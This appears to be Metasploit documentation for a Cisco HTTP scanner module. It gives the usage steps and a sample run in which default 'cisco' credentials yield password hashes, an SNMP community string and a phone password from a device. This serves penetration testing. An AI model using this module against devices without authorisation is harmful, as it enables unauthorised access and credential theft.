Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
Vulnerable Application
Any Cisco networking device with the HTTP interface turned on.
Verification Steps
Enable the web interface on a cisco device ip http server
Start msfconsole
Do: use auxiliary/scanner/http/cisco_device_manager
Do: set RHOSTS [IP]
Do: run
Options
HttpUsername
Username to use for basic authentication. Default value is cisco
HttpPassword
Password to use for basic authentication. Default value is cisco
Scenarios
Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
msf > use auxiliary/scanner/http/cisco_device_manager
msf auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed